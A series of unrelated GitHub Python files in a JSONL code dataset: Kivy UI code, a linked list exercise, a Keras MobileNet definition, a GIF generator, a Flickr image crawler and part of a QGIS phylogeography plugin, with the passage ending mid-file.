flash(\"date_siting must be filled in\",\"sasq\")\n return is_valid\n","repo_name":"Blasphony/Coding-Folder","sub_path":"Python/flask_mysql/belt_review/Sasq/flask_app/models/sasq.py","file_name":"sasq.py","file_ext":"py","file_size_in_byte":2544,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"72556173433","text":"from kivy.app import App\nfrom kivy.uix.button import Button\nfrom kivy.uix.gridlayout import GridLayout\nfrom kivy.uix.boxlayout import BoxLayout\nfrom kivy.uix.textinput import TextInput\nclass GridApp(App):\n def build(self):\n bl = BoxLayout (orientation = \"vertical\", padding = 10 )\n gl = GridLayout(rows = 2)\n gl.add_widget(Button(text = \"Выбрать магазин\", on_press = self.VibratMagazApp))\n gl.add_widget(Button(text = \"Вести свой предмет и цену\"))\n \n \n bl.add_widget(gl)\n return bl\nclass VibratMagazApp(App):\n def build(self):\n bl = BoxLayout (orientation = \"vertical\", padding = 10 )\n gl = GridLayout(rows = 3)\n gl.add_widget(Button(text = \"Сильпо\" ))\n gl.add_widget(Button(text = \"МегаМаркет\"))\n gl.add_widget(Button(text = \"Атб\"))\n bl.add_widget(gl)\n return bl\n\nclass MyApp(App):\n def build(self):\n bf = BoxLayout (orientation = \"vertical\", padding = 10 )\n gf = GridLayout(rows = 2)\n gf.add_widget(Button(text = \"Тип : пикник\"))\n gf.add_widget(Button(text = \"Тип : вечеринка\"))\n \n bf.add_widget(gf)\n return bf\nclass VestipredmetApp(App):\n def build (self):\n bl = BoxLayout (orientation = \"vertical\", padding = 10 )\n gl = GridLayout(rows = 4)\n gl.add_widget(TextInput(text = \"Введите название предмета\"))\n gl.add_widget(TextInput(text = \"Введите цену на предмет\"))\n gl.add_widget (TextInput(text = \"Введите кол. людей\"))\n gl.add_widget(Button(text = \"Готово\"))\n bl.add_widget(gl)\n return bl\nclass TipPicnickApp(App):\n def build (self):\n bl = bl = BoxLayout (orientation = \"vertical\", padding = 10 )\n gl = GridLayout(rows = 2)\n gl.add_widget(TextInput(text = \"Введите название точное название продукта\"))\n gl.add_widget(Button(text = \"Готово\"))\nif __name__ == \"__main__\":\n GridApp().run()\n","repo_name":"Merdet/proect1","sub_path":"gh/project.py.py","file_name":"project.py.py","file_ext":"py","file_size_in_byte":2129,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"34496767013","text":"#Jaime Santiago Garci­a\n#No. de registro: 20310369\n#Practica #18\n\n#---------------------------------------------------------------------------------------------\n\n# Crea una lista de 10 elementos\ncolores = ['rojo', 'azul', 'verde', 'amarillo', 'marrón', 'lila', 'negro', 'rosa', 'blanco', 'naranja'] \n# Convierte la lista en una tupla usando la función tuple()\ncolorestupla = tuple(colores)\n# Imprime el tipo de dato de la tupla resultante usando la función type()\nprint(type(colorestupla))\n","repo_name":"Jsantiago29/IA-Practicas-Parcial1","sub_path":"23_02_26-018_ConvertiraTupla_V01.py","file_name":"23_02_26-018_ConvertiraTupla_V01.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"33785270079","text":"\"\"\"\nTest the 'limited' method from the 'dict' module.\n\"\"\"\n\n# module under test\nfrom vcorelib.dict import limited\n\n\ndef test_limited_basic():\n \"\"\"Test basic functionality of the limited method.\"\"\"\n\n data = {\"a\": 1}\n with limited(data, \"a\", 2):\n assert data[\"a\"] == 2\n assert data[\"a\"] == 1\n\n with limited(data, \"b\"):\n assert \"b\" not in data\n","repo_name":"vkottler/vcorelib","sub_path":"tests/dict/test_limited.py","file_name":"test_limited.py","file_ext":"py","file_size_in_byte":369,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"95"} +{"seq_id":"37706746619","text":"# Create the Node class\n\nclass Node():\n \n def __init__(self, initial_data):\n self.data = initial_data\n self.next = None\n\n \n def setData(self, new_data):\n self.data = new_data\n\n\n def getData(self):\n return self.data\n\n \n def setNext(self, next_node): # adding a node to the linked list\n self.next = next_node\n\n\n def getNext(self):\n return self.next\n\n\nclass UnorderedList():\n \n def __init__(self):\n self.head = None\n self.size = 0\n\n\n def isEmpty(self):\n return self.head == None\n\n \n # this adds a node to the BEGINNING of the list\n def add(self, item):\n temp = Node(item)\n old_head = self.head\n temp.setNext(old_head)\n self.head = temp\n self.size += 1\n\n\n def size(self):\n return self.size\n \n\n def search(self, item):\n current_node = self.head\n while current is not None:\n if current_node.getData() == item:\n return True\n else:\n current_node = current_node.getNext()\n return False\n\n\n def remove(self, item):\n # Set base variables\n current_node = self.head\n previous_node = None\n found = False\n\n # traverse through the list\n while not found:\n # if the node's data == the item, break the loop\n if current_node.getData() == item:\n found = True\n else:\n previous_node = current_node\n current_node = current_node.getNext()\n \n # if the previous node is empty and we found the data\n if previous_node == None and found:\n # set the head of the list to the next node; we're just removing the node from the list\n self.head = current_node.getNext()\n # otherwise, if the data is found and there is a previous node, we use THAT data\n elif found:\n previous_node.setNext(current.getNext())\n\n self.size -= 1\n\n\n def append(self, item):\n current_node = self.head\n new_node = Node(item)\n\n if current_node is None:\n self.head = new_node\n else:\n while current_node is not None:\n if current_node.getNext() is None:\n current_node.setNext(new_node)\n \n self.size += 1\n\n\n def insert(self, item, position):\n current_node = self.head\n previous_node = None\n new_node = Node(item)\n count = 0\n\n \n if position == 0:\n self.add(new_node)\n else:\n # Keep getting nodes until we're in position\n while count != position:\n previous_node = current_node\n current_node = current_node.getNext()\n count += 1\n\n new_node.setNext(current_node)\n previous_node.setNext(new_node)\n\n self.size += 1\n \n \n def index(self, item):\n current_node = self.head\n count = 0\n\n while current_node is not None:\n if current_node.getData() == item:\n return count\n else:\n current_node = current_node.getNext()\n count += 1\n\n\n def pop(self, position = None): # O(log n)\n if position is None:\n position = self.size\n current_node = self.head\n previous_node = None\n next_node = current_node.getNext()\n count = 0\n # Check to see if we're at position\n\n while position != count: # O(log n)\n previous_node = current_node\n current_node = next_node\n next_node = current_node.getNext()\n count += 1\n\n data = current_node.getData()\n previous_node.setNext(next_node)\n\n self.size -= 1 \n \n return data\n\n\n \n\n\n\n \"\"\"\n\n if next_node is None:\n self.head = None\n else:\n while next_node is not None:\n previous_node = current_node\n current_node = current_node.getNext()\n next_node = current_node.getNext()\n \n previous_node.setNext(None)\n \n return current_node.getData()\n \"\"\" \n\n \n \n \n\n\n\n","repo_name":"dmmceldowney/python-algorithms-examples-notes","sub_path":"chapter3/list.py","file_name":"list.py","file_ext":"py","file_size_in_byte":4300,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"15725409008","text":"import warnings\nimport numpy as np\n\nfrom keras.preprocessing import image\nfrom keras.models import Model\nfrom keras.layers import DepthwiseConv2D,Input,Activation,Dropout,Reshape,BatchNormalization,GlobalAveragePooling2D,GlobalMaxPooling2D,Conv2D\nfrom keras.applications.imagenet_utils import decode_predictions\nfrom keras import backend as K\n\n\ndef MobileNet(input_shape=[224,224,3],\n depth_multiplier=1,\n dropout=1e-3,\n classes=1000):\n\n\n img_input = Input(shape=input_shape)\n\n # 224,224,3 -> 112,112,32 \n x = _conv_block(img_input, 32, strides=(2, 2))\n # 112,112,32 -> 112,112,64\n x = _depthwise_conv_block(x, 64, depth_multiplier, block_id=1)\n\n\n # 112,112,64 -> 56,56,128\n x = _depthwise_conv_block(x, 128, depth_multiplier,\n strides=(2, 2), block_id=2)\n # 56,56,128 -> 56,56,128\n x = _depthwise_conv_block(x, 128, depth_multiplier, block_id=3)\n\n\n # 56,56,128 -> 28,28,256\n x = _depthwise_conv_block(x, 256, depth_multiplier,\n strides=(2, 2), block_id=4)\n # 28,28,256 -> 28,28,256\n x = _depthwise_conv_block(x, 256, depth_multiplier, block_id=5)\n \n\n # 28,28,256 -> 14,14,512\n x = _depthwise_conv_block(x, 512, depth_multiplier,\n strides=(2, 2), block_id=6)\n # 14,14,512 -> 14,14,512\n x = _depthwise_conv_block(x, 512, depth_multiplier, block_id=7)\n x = _depthwise_conv_block(x, 512, depth_multiplier, block_id=8)\n x = _depthwise_conv_block(x, 512, depth_multiplier, block_id=9)\n x = _depthwise_conv_block(x, 512, depth_multiplier, block_id=10)\n x = _depthwise_conv_block(x, 512, depth_multiplier, block_id=11)\n\n # 14,14,512 -> 7,7,1024\n x = _depthwise_conv_block(x, 1024, depth_multiplier,\n strides=(2, 2), block_id=12)\n x = _depthwise_conv_block(x, 1024, depth_multiplier, block_id=13)\n\n # 7,7,1024 -> 1,1,1024\n # 7x7x1024 \n # 1024\n x = GlobalAveragePooling2D()(x)\n x = Reshape((1, 1, 1024), name='reshape_1')(x)\n x = Dropout(dropout, name='dropout')(x)\n # 1024*2\n x = Conv2D(classes, (1, 1),padding='same', name='conv_preds')(x)\n x = Activation('softmax', name='act_softmax')(x)\n x = Reshape((classes,), name='reshape_2')(x)\n\n inputs = img_input\n\n model = Model(inputs, x, name='mobilenet_1_0_224_tf')\n\n return model\n\ndef _conv_block(inputs, filters, kernel=(3, 3), strides=(1, 1)):\n x = Conv2D(filters, kernel,\n padding='same',\n use_bias=False,\n strides=strides,\n name='conv1')(inputs)\n x = BatchNormalization(name='conv1_bn')(x)\n return Activation(relu6, name='conv1_relu')(x)\n\n\ndef _depthwise_conv_block(inputs, pointwise_conv_filters,\n depth_multiplier=1, strides=(1, 1), block_id=1):\n\n x = DepthwiseConv2D((3, 3),\n padding='same',\n depth_multiplier=depth_multiplier,\n strides=strides,\n use_bias=False,\n name='conv_dw_%d' % block_id)(inputs)\n\n x = BatchNormalization(name='conv_dw_%d_bn' % block_id)(x)\n x = Activation(relu6, name='conv_dw_%d_relu' % block_id)(x)\n\n x = Conv2D(pointwise_conv_filters, (1, 1),\n padding='same',\n use_bias=False,\n strides=(1, 1),\n name='conv_pw_%d' % block_id)(x)\n x = BatchNormalization(name='conv_pw_%d_bn' % block_id)(x)\n return Activation(relu6, name='conv_pw_%d_relu' % block_id)(x)\n\ndef relu6(x):\n return K.relu(x, max_value=6)\n\n\ndef preprocess_input(x):\n x /= 255.\n x -= 0.5\n x *= 2.\n return x\n\n# if __name__ == '__main__':\n# model = MobileNet(input_shape=(224, 224, 3))\n#\n# # model.summary()\n#\n# img_path = 'elephant.jpg'\n# img = image.load_img(img_path, target_size=(224, 224))\n# x = image.img_to_array(img)\n# x = np.expand_dims(x, axis=0)\n# x = preprocess_input(x)\n# print('Input image shape:', x.shape)\n#\n# preds = model.predict(x)\n# print(np.argmax(preds))\n# print('Predicted:', decode_predictions(preds, 1))\n","repo_name":"Aristochi/Dangerous_driving_behavior_detection","sub_path":"Facemask/mobileNet.py","file_name":"mobileNet.py","file_ext":"py","file_size_in_byte":4167,"program_lang":"python","lang":"en","doc_type":"code","stars":170,"dataset":"github-code","pt":"95"} +{"seq_id":"12794514055","text":"from PIL import Image, ImageDraw, ImageFont\nimport imageio\nfrom pathlib import Path\nimport sys\nfrom resizeimage import resizeimage\n\ninput_text = sys.argv[1]\nlines = input_text.split('/')\n\noriginal_image = Image.open('corona.jpg')\noriginal_image = resizeimage.resize_height(original_image, 500)\noriginal_image.save(\"resized.png\")\n\nresized_image = Image.open(\"resized.png\")\n(width, height) = resized_image.size\nresized_image = resized_image.crop((width/2 - 250, height/2 - 250, width/2 + 250, height/2+250))\nresized_image = resized_image.point(lambda p: p * 0.3)\n\ndraw = ImageDraw.Draw(resized_image)\n\ndef drawText(text, output_name, y = 50):\n font = ImageFont.truetype('rm_typerighter.ttf', size=60)\n x = 50\n color = 'rgb(255, 255, 255)'\n\n draw.text((x, y), text, fill=color, font=font)\n\n resized_image.save(\"source_images/\" + output_name + \".png\")\n print(\"\\tCreated: \" + output_name + \".png\")\n\ndef drawLines(lines):\n y_value = 50\n scene_num = 1\n for line in lines:\n for i in range(1, len(line) + 1):\n partial = \"\"\n for j in range(i):\n partial += line[j]\n\n drawText(partial, \"scene_\" + str(scene_num), y_value)\n scene_num += 1\n y_value += 60\n\ndef makeGif():\n image_path = Path('source_images')\n images = list(image_path.glob('*.png'))\n image_list = []\n\n for file_name in images:\n image_list.append(imageio.imread(file_name))\n print(\"\\tFile:\", file_name, \"read\")\n\n print(\"Writing GIF\")\n imageio.mimwrite('result.gif', image_list, duration=0.1)\n print(\"DONE\")\n\n\ndrawLines(lines)\nmakeGif()\n\n","repo_name":"alvanrahimli/gif_maker_app","sub_path":"create_images.py","file_name":"create_images.py","file_ext":"py","file_size_in_byte":1622,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"69910467192","text":"# -*- coding: utf-8 -*-\n\nimport datetime\nimport json\nimport math\nimport os\n\nfrom six.moves.urllib.parse import urlencode\n\nfrom icrawler import Crawler, Feeder, Parser, ImageDownloader\n\n\nclass FlickrFeeder(Feeder):\n\n def feed(self, apikey=None, max_num=4000, **kwargs):\n self.logger.debug('feed in')\n if apikey is None:\n apikey = os.getenv('FLICKR_APIKEY')\n if not apikey:\n self.logger.error('apikey is not specified')\n return\n\n self.logger.debug('apikey:{}'.format(apikey))\n\n if max_num > 4000:\n max_num = 4000\n self.logger.warning(\n 'max_num exceeds 4000, set it to 4000 automatically.')\n base_url = 'https://api.flickr.com/services/rest/?'\n params = {\n 'method': 'flickr.photos.search',\n 'api_key': apikey,\n 'format': 'json',\n 'nojsoncallback': 1\n }\n for key in kwargs:\n if key in ['user_id', 'tags', 'tag_mode', 'text', 'license',\n 'sort', 'privacy_filter', 'accuracy', 'safe_search',\n 'content_type', 'machine_tags', 'machine_tag_mode',\n 'group_id', 'contacts', 'woe_id', 'place_id', 'has_geo',\n 'geo_context', 'lat', 'lon', 'radius', 'radius_units',\n 'is_commons', 'in_gallery', 'is_getty', 'extras',\n 'per_page', 'page']: # yapf: disable\n params[key] = kwargs[key]\n elif key in ['min_upload_date', 'max_upload_date',\n 'min_taken_date', 'max_taken_date']: # yapf: disable\n val = kwargs[key]\n if isinstance(val, datetime.date):\n params[key] = val.strftime('%Y-%m-%d')\n elif isinstance(val, (int, str)):\n params[key] = val\n else:\n self.logger.error('%s is invalid', key)\n else:\n self.logger.error('Unrecognized search param: %s', key)\n\n url = base_url + urlencode(params)\n per_page = params.get('per_page', 10)\n page = params.get('page', 1)\n page_max = int(math.ceil(max_num / per_page))\n self.logger.debug('max_num:{},per_page:{},page:{},page_max:{}'.format(max_num,per_page,page, page_max))\n for i in range(page, page + page_max):\n complete_url = '{}&page={}'.format(url, i)\n self.output(complete_url)\n self.logger.debug('put url to url_queue: {}'.format(complete_url))\n\n\nclass FlickrParser(Parser):\n\n def parse(self, response):\n content = json.loads(response.content.decode())\n if content['stat'] != 'ok':\n return\n photos = content['photos']['photo']\n for photo in photos:\n farm_id = photo['farm']\n server_id = photo['server']\n photo_id = photo['id']\n secret = photo['secret']\n img_url = 'https://farm{}.staticflickr.com/{}/{}_{}.jpg'.format(\n farm_id, server_id, photo_id, secret)\n yield dict(file_url=img_url, meta=photo)\n\n\nclass FlickrImageCrawler(Crawler):\n\n def __init__(self,\n apikey=None,\n feeder_cls=FlickrFeeder,\n parser_cls=FlickrParser,\n downloader_cls=ImageDownloader,\n *args,\n **kwargs):\n self.apikey = apikey\n super(FlickrImageCrawler, self).__init__(\n feeder_cls, parser_cls, downloader_cls, *args, **kwargs)\n\n def crawl(self, max_num=1000, file_idx_offset=0, **kwargs):\n kwargs['apikey'] = self.apikey\n kwargs['max_num'] = max_num\n super(FlickrImageCrawler, self).crawl(\n feeder_kwargs=kwargs,\n downloader_kwargs=dict(\n max_num=max_num, file_idx_offset=file_idx_offset))\n","repo_name":"DevinWangGZ/picture_crawler","sub_path":"icrawler/builtin/flickr.py","file_name":"flickr.py","file_ext":"py","file_size_in_byte":3906,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"17337235546","text":"import csv, os, sys, string, Cookie, sha, time, random, cgi, urllib\nimport datetime, StringIO, pickle, urllib2\n\nfrom PyQt4 import *\nfrom PyQt4.QtCore import *\nfrom PyQt4.QtGui import *\nfrom qgis.core import *\nfrom qgis.gui import *\n\nfrom ui.ui_phylogeorecdialog import Ui_PhyloGeoRecDialogBase\n\nfrom export import exportToThreeJS\nfrom exportsettings import ExportSettings\nfrom qgis2threejscore import ObjectTreeItem, MapTo3D\nfrom phylogeorectools import logMessage\nfrom rotatedrect import RotatedRect\nfrom settings import debug_mode, def_vals, plugin_version\nimport propertypages as ppages\nimport phylogeorectools as tools\n\n# Import external libraries\nfrom Bio import Phylo\nimport logging\nfrom geotree_parse_neo2b import *\n\nclass PhyloGeoRecDialog(QDialog):\n\n#Init Section\n\n def __init__(self, iface, objectTypeManager, pluginManager, projectSettings, exportSettings=None, lastTreeItemData=None):\n # QGIS2threejs Section Starts Here #\n QDialog.__init__(self, iface.mainWindow())\n self.iface = iface\n self.objectTypeManager = objectTypeManager\n self.pluginManager = pluginManager\n self._settings = exportSettings or {}\n self.lastTreeItemData = lastTreeItemData\n self.localBrowsingMode = True\n\n self.rb_quads = self.rb_point = None\n\n self.templateType = None\n self.currentItem = None\n self.currentPage = None\n\n # Set up the user interface from Designer.\n self.ui = ui = Ui_PhyloGeoRecDialogBase()\n ui.setupUi(self)\n\n self.setWindowFlags(self.windowFlags() | Qt.WindowMinimizeButtonHint)\n\n # output html filename\n #ui.lineEdit_OutputFilename.setText(self._settings.get(\"OutputFilename\", \"\")) -> Weird!\n ui.lineEdit_OutputFilename.setPlaceholderText(\"[Temporary file]\")\n\n # settings button\n icon = QIcon(os.path.join(tools.pluginDir(), \"icons\", \"settings.png\"))\n ui.toolButton_Settings.setIcon(icon)\n\n # popup menu displayed when settings button is pressed\n items = [[\"Load Settings...\", self.loadSettings],\n [\"Save Settings As...\", self.saveSettings],\n [None, None],\n [\"Clear Settings\", self.clearSettings],\n [None, None],\n [\"Plugin Settings...\", self.pluginSettings]]\n\n self.menu = QMenu()\n self.menu_actions = []\n for text, slot in items:\n if text:\n action = QAction(text, iface.mainWindow())\n action.triggered.connect(slot)\n self.menu.addAction(action)\n self.menu_actions.append(action)\n else:\n self.menu.addSeparator()\n\n ui.toolButton_Settings.setMenu(self.menu)\n ui.toolButton_Settings.setPopupMode(QToolButton.InstantPopup)\n\n # progress bar and message label\n ui.progressBar.setVisible(False)\n ui.label_MessageIcon.setVisible(False)\n\n # buttons\n ui.pushButton_Run.clicked.connect(self.run)\n ui.pushButton_Close.clicked.connect(self.reject)\n ui.pushButton_Help.clicked.connect(self.help)\n\n # set up map tool\n self.previousMapTool = None\n self.mapTool = RectangleMapTool(iface.mapCanvas())\n #self.mapTool = PointMapTool(iface.mapCanvas())\n\n # set up the template combo box\n #self.initTemplateList() -> Weird!\n self.ui.comboBox_Template.currentIndexChanged.connect(self.currentTemplateChanged)\n\n # set up the properties pages\n self.pages = {}\n self.pages[ppages.PAGE_WORLD] = ppages.WorldPropertyPage(self)\n self.pages[ppages.PAGE_CONTROLS] = ppages.ControlsPropertyPage(self)\n self.pages[ppages.PAGE_DEM] = ppages.DEMPropertyPage(self)\n self.pages[ppages.PAGE_VECTOR] = ppages.VectorPropertyPage(self)\n container = ui.propertyPagesContainer\n for page in self.pages.itervalues():\n page.hide()\n container.addWidget(page)\n\n # build object tree\n self.topItemPages = {ObjectTreeItem.ITEM_WORLD: ppages.PAGE_WORLD, ObjectTreeItem.ITEM_CONTROLS: ppages.PAGE_CONTROLS, ObjectTreeItem.ITEM_DEM: ppages.PAGE_DEM}\n self.initObjectTree()\n self.ui.treeWidget.currentItemChanged.connect(self.currentObjectChanged)\n self.ui.treeWidget.itemChanged.connect(self.objectItemChanged)\n self.currentTemplateChanged() # update item visibility\n\n ui.toolButton_Browse.clicked.connect(self.browseClicked)\n\n #iface.mapCanvas().mapToolSet.connect(self.mapToolSet) # to show button to enable own map tool\n\n # PhyloGeoRec Section Starts Here #\n\n # connect to main components\n self.ui.cmdBrwPhylo.clicked.connect(self.loadPhyloTreeFile)\n self.ui.cmdBrwRelationTable.clicked.connect(self.loadRelationTableFile)\n self.ui.cmdBrwGeoPath.clicked.connect(self.saveGeophylogenyProjectFolder)\n self.ui.cmdGenGeo.clicked.connect(self.generateRealSamplingPoint)\n self.ui.cmdGenGeo.clicked.connect(self.generateGeophylogeny_LeafNodes)\n self.ui.cmdGenGeo.clicked.connect(self.generateGeophylogeny_LeafZ)\n self.ui.cmdGenGeo.clicked.connect(self.generateGeophylogeny_TreeNodes)\n self.ui.cmdGenGeo.clicked.connect(self.generateGeophylogeny_TreeNetworks)\n self.ui.cmdGenGeo.clicked.connect(self.generateGeophylogeny_RootPoint)\n # self.ui.cmdGenGeo.clicked.connect(self.generateGeophylogenyDropline) # Dropline generation cannot be performed in QGIS, due to qgisgeom doesn't support Z.\n\n # Build Phylogenetic Tree Viewer\n QObject.connect(self.ui.cmdBrwPhylo, SIGNAL(\"clicked()\"), self.updatePhyloTreeView)\n\n # Build Table Viewer\n self.model = QtGui.QStandardItemModel(self)\n self.ui.tableView_Relation.setModel(self.model)\n self.ui.tableView_Relation.horizontalHeader().setStretchLastSection(True)\n\n\n QObject.connect(self.ui.cmdBrwRelationTable, SIGNAL(\"clicked()\"), self.drawDataTable)\n # QObject.connect(self.tabWidget, SIGNAL('currentChanged (int)'), self.drawDataTable)\n\n\n#Init Section End\n\n\n#Data Props Section\n\n def loadPhyloTreeFile(self):\n # file open dialog for Phylogenetic Tree\n tree_dir = os.getcwd()\n if not tree_dir:\n tree_dir = os.path.split(self.ui.lineEdit_Phylo.text())[0]\n if not tree_dir:\n tree_dir = os.path.dirname(QFile.decodeName(__file__))\n tree_filterString = \"Newick Tree File (*.nwk;*.tre);;GenGIS GeoTree Model (*.gtm);;All Files (*.*)\"\n tree_filename = QFileDialog.getOpenFileName(self, \"Load Phylogenetic Tree\", tree_dir, tree_filterString)\n if not tree_filename:\n return\n\n self.ui.lineEdit_Phylo.setText(tree_filename)\n\n if str(self.ui.lineEdit_Phylo.text()) == \"\":\n pass\n\n #Dump Tree in dumps\n treedump = open(self.ui.lineEdit_Phylo.text()).read()\n self.ui.textEdit_Phylo.setText(treedump)\n\n def loadRelationTableFile(self):\n # file open dialog for Relation Table\n relatbl_dir = os.getcwd()\n if not relatbl_dir:\n relatbl_dir = os.path.split(self.ui.lineEdit_RelationTablePath.text())[0]\n if not relatbl_dir:\n relatbl_dir = os.path.dirname(QFile.decodeName(__file__))\n relatbl_filterString = \"Comma Separated Values (*.csv);;;;All Files (*.*)\"\n\n csvFilePath = QFileDialog.getOpenFileName(\n self,\n \"Load Relation Table\",\n relatbl_dir,\n relatbl_filterString)\n if csvFilePath:\n relatbl_filename = csvFilePath\n if not relatbl_filename:\n return\n\n self.ui.lineEdit_RelationTablePath.setText(relatbl_filename)\n\n if str(self.ui.lineEdit_RelationTablePath.text()) == \"\":\n pass\n\n #Dump Coords in dumps\n coordsdump = open(self.ui.lineEdit_RelationTablePath.text()).read()\n self.ui.textEdit_Coords.setText(coordsdump)\n\n def saveGeophylogenyProjectFolder(self, geoprj_dir=None):\n if not geoprj_dir:\n # file save dialog\n geoprj_dir = os.getcwd()\n if not geoprj_dir:\n geoprj_dir = os.path.split(self.ui.lineEdit_GeoPath.text())[0]\n if not geoprj_dir:\n geoprj_dir = QDir.homePath()\n geoprj_dir = QFileDialog.getExistingDirectory(self, \"Save Phylogeography Model to Folder ...\")\n if not geoprj_dir:\n return\n\n self.ui.lineEdit_GeoPath.setText(geoprj_dir + '\\\\')\n\n if str(self.ui.lineEdit_GeoPath.text()) == \"\":\n pass\n\n#Data Props Section End\n\n\n#Relation Table Section\n def drawDataTable(self, role = Qt.DisplayRole):\n #Test Update\n self.ui.tableView_Relation.clearSpans()\n\n #get CSV\n CSVName = self.ui.lineEdit_RelationTablePath.text()\n\n with open(CSVName, \"rb\") as mycsvfile:\n thedata = csv.reader(mycsvfile, delimiter = ';')\n # Fill Data\n # thedata.next() -. Skip data in CSV first line\n for row in thedata:\n items = [\n QtGui.QStandardItem(field)\n for field in row\n ]\n self.model.appendRow(items)\n self.ui.tableView_Relation.setModel(self.model)\n#Relation Table Section End\n\n\n#Phylogenetic Tree Viewer Section\n def updatePhyloTreeView(self):\n phylo_tree = Phylo.read(self.ui.lineEdit_Phylo.text(), 'newick')\n\n #Note: it will print the branch lengths on the edges, but we will remove\n #all lengths that are less than 0.02 to avoid clutter\n #Must it changed?\n # phylo_tree_draw = Phylo.draw(phylo_tree, branch_labels=lambda c:\n # c.branch_length if c.branch_length > 0.02 else None,\n # axes=ax)\n\n #Note: This code will print the branch lengths on the edges, and not remove even the clutter stuffs\n Phylo.draw(phylo_tree, branch_labels=lambda c: c.branch_length)\n # return True\n#Phylogenetic Tree Viewer Section End\n\n\n\n#Generate Geophylogeny Construct\n def generateRealSamplingPoint(self, rsp_filename=None):\n if not rsp_filename:\n # file save dialog\n rsp_directory = os.path.split(self.ui.lineEdit_GeoPath.text())[0]\n rsp_filename = QFileDialog.getSaveFileName(self, \"Save Real Sampling Point Data\", rsp_directory, \"Keyhole Markup Language (*.kml)\")\n if not rsp_filename:\n return\n\n if str(self.ui.lineEdit_Phylo.text()) == '' and str(self.ui.lineEdit_RelationTablePath.text()) == '':\n QMessageBox.warning(self, \"PhyloGeoRec\", \"Required data not satisfied. Please check\")\n return\n\n #Create Real Sampling Point\n #Load Data\n data = csv.reader(open(self.ui.lineEdit_RelationTablePath.text()), delimiter = ';')\n #Skip the 1st header row.\n #data.next()\n #Open the file to be written.\n f = open(rsp_filename, 'w')\n #Writing the kml file.\n f.write(\"\\n\")\n f.write(\"\"\"\\n\"\"\")\n f.write(\"\\n\")\n f.write(\"\\n\")\n f.write(\" Sampling Points \\n\")\n #TODO: Make Flexible, so user can input which row they needed freely\n for row in data:\n f.write(\" \\n\")\n f.write(\" \" + str(row[0]) + \"\\n\")\n f.write(\" \" + str(row[0]) + \"\\n\")\n f.write(\" \\n\")\n f.write(\" \" + str(row[2]) + \",\" + str(row[1]) + \"\\n\") # With elev, however it not yet yound. If found: f.write(\" \" + str(row[x]) + \",\" + str(row[y]) + \",\" + str(row[z]) + \"\\n\")\n f.write(\" \\n\")\n f.write(\" \\n\")\n f.write(\"\\n\")\n f.write(\"\\n\")\n f.write(\"\\n\")\n f.close()\n\n def generateGeophylogeny_LeafNodes(self, leafnodes_filename=None):\n kml = \"\"\n if not leafnodes_filename:\n # file save dialog\n workdir = os.path.split(self.ui.lineEdit_GeoPath.text())[0]\n leafnodes_filename = QFileDialog.getSaveFileName(self, \"Save Phylogeography Reconstruction Leaf Nodes Data\", workdir, \"Keyhole Markup Laguage (*.kml)\")\n if not leafnodes_filename:\n return\n\n #advanced fields\n #TODO: Make flexible for future\n mydomain = \"http://nkresearch.ub.ac.id\"\n branch_color = \"FF00FF00\"\n branch_width = 3\n icon = \"http://maps.google.com/mapfiles/kml/shapes/placemark_circle.png\"\n alt_grow = 1000\n proximity = 3\n title = \"Geophylogeny Leaf Nodes\"\n\n #Let's Rock\n\n #Retrieve dumped elements to string\n tree = str(self.ui.textEdit_Phylo.toPlainText()) #self.request.get('tree')\n coords = str(self.ui.textEdit_Coords.toPlainText()) #self.request.get('coords')\n #kmlMeta = build_kml_leaf(tree,coords,branch_color,branch_thickness,icon,alt_grow,proximity,title) #mydomain removed\n kmlMeta = build_kml_leafnodes(tree,coords,mydomain,branch_color,branch_width,icon,alt_grow,proximity,title)\n kml = kmlMeta.kml\n taxa = kmlMeta.taxa\n err = kmlMeta.err\n type = kmlMeta.type\n\n f = open(leafnodes_filename, 'w')\n f.write(str(kml))\n f.close()\n\n\n def generateGeophylogeny_LeafZ(self, leafz_filename=None):\n kml = \"\"\n if not leafz_filename:\n # file save dialog\n workdir = os.path.split(self.ui.lineEdit_GeoPath.text())[0]\n leafz_filename = QFileDialog.getSaveFileName(self, \"Save Phylogeography Reconstruction Leaf Z Attribute Data\", workdir, \"Keyhole Markup Laguage (*.kml)\")\n if not leafz_filename:\n return\n\n #advanced fields\n #TODO: Make flexible for future\n mydomain = \"http://nkresearch.ub.ac.id\"\n branch_color = \"FF00FF00\"\n branch_width = 3\n icon = \"http://maps.google.com/mapfiles/kml/shapes/placemark_circle.png\"\n alt_grow = 1000\n proximity = 3\n title = \"Geophylogeny Leaf Z Attributes\"\n\n #Let's Rock\n\n #Retrieve dumped elements to string\n tree = str(self.ui.textEdit_Phylo.toPlainText()) #self.request.get('tree')\n coords = str(self.ui.textEdit_Coords.toPlainText()) #self.request.get('coords')\n #kmlMeta = build_kml_leaf(tree,coords,branch_color,branch_thickness,icon,alt_grow,proximity,title) #mydomain removed\n kmlMeta = build_kml_leafZ(tree,coords,mydomain,branch_color,branch_width,icon,alt_grow,proximity,title)\n kml = kmlMeta.kml\n taxa = kmlMeta.taxa\n err = kmlMeta.err\n type = kmlMeta.type\n\n f = open(leafz_filename, 'w')\n f.write(str(kml))\n f.close()\n\n\n def generateGeophylogeny_TreeNodes(self, treenodes_filename=None):\n kml = \"\"\n if not treenodes_filename:\n # file save dialog\n workdir = os.path.split(self.ui.lineEdit_GeoPath.text())[0]\n treenodes_filename = QFileDialog.getSaveFileName(self, \"Save Phylogeography Reconstruction Tree Nodes Data\", workdir, \"Keyhole Markup Laguage (*.kml)\")\n if not treenodes_filename:\n return\n\n #advanced fields\n #TODO: Make flexible for future\n mydomain = \"http://nkresearch.ub.ac.id\"\n branch_color = \"FF00FF00\"\n branch_width = 3\n icon = \"http://maps.google.com/mapfiles/kml/shapes/placemark_circle.png\"\n alt_grow = 1000\n proximity = 3\n title = \"Geophylogeny HTU Nodes\"\n\n #Let's Rock\n\n #Retrieve dumped elements to string\n tree = 